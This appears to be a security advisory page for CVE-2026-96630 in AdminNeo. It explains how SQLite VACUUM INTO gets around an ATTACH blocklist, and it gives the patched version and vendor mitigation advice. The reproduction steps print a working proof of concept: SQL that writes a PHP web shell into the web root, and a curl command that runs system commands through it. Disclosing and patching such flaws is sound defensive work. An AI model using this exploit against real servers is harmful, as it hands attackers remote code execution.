CVE-2026-96630 is a high-severity (CVSS 7.2) vulnerability in adminneo-org/adminneo. A fix is available for adminneo-org/adminneo — see the affected versions and patch details below.
AdminNeo: RCE via SQLite VACUUM INTO (ATTACH Blocklist Bypass)
Real-World Exposure
adminneo-org/adminneoReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
Adminer blocks ATTACH queries for SQLite to prevent arbitrary file creation. However, VACUUM INTO is not blocked and achieves the same result: writing a database file containing attacker-controlled PHP code to any path with any extension. An authenticated SQLite user can write a web shell to the web root and execute commands.
Originally reported in Adminer: GHSA-q4f2-39gr-45jh
Root Cause
sql.inc.php, line 146:
if (DIALECT == "sqlite" && preg_match("~^$space*+ATTACH\\b~i", $q, $match)) {
// blocked
}
Only ATTACH is in the blocklist. VACUUM INTO (available since SQLite 3.27.0) writes the entire database to a new file at an arbitrary path with an arbitrary extension. It is not checked.
Steps To Reproduce
1. Login to SQLite
- Open AdminNeo and select driver: SQLite
- Login and create a new database (e.g.,
stage.db)
2. Inject PHP code and write the shell
Navigate to SQL command and execute:
CREATE TABLE "<?php system($_GET['c']); ?>" (i int);
VACUUM INTO '/var/www/html/shell.php';
The SQLite file is written to /var/www/html/shell.php. The table name containing <?php appears as raw bytes in the file. PHP's parser finds and executes it.
3. Execute commands
curl "http://TARGET/shell.php?c=id"
# uid=0(root) gid=0(root) groups=0(root)
Collaborator Request
This vulnerability was discovered jointly with Yashar Shahinzadeh (GitHub: @voorivex). Could you please add him as a collaborator on this advisory and credit him as a co-discoverer? Thank you!
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | adminneo-org/adminneo | all versions | 5.5.1composer require adminneo-org/adminneo:^5.5.1 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for adminneo-org/adminneo, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update adminneo-org/adminneo to 5.5.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2026-96630 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
Frequently Asked Questions
Is CVE-2026-96630 in your dependencies?
Find it across Packagist, including transitive dependencies.